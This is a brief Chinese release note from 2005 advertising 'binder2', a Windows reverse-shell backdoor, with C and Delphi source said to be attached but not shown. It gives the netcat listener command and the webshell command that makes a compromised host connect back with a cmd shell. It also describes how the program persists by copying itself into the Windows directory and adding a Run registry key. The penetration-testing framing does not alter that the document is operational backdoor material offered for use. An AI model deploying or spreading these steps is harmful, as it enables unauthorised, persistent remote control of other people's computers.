Winsock2为kol socket单元文件,修改自c版代码binder2.c
源代码附c版和Delphi版 binder2程序。
使用说明:
binder2.exe 反弹式后门程序
简介:
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.
用法:
1. 在本地机器监听一个端口:
netcat -vv -l -p 80
2. 通过webShell或是别的什么运行后门:
kol_binder2 80 youIPadd
3. 本地监听端口将截获一个来自远程主机的cmd.
注意:
程序本身会创建一个自启动方法,如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址127.0.0.1,端口1234.
程序会复制自身到c:\winnt\下名为binder2.exe,并在HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 kol_binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)
Code by hnxyy
Date:2005/6/16
QQ:19026695
www.wrsky.com
火狐技术联盟 |
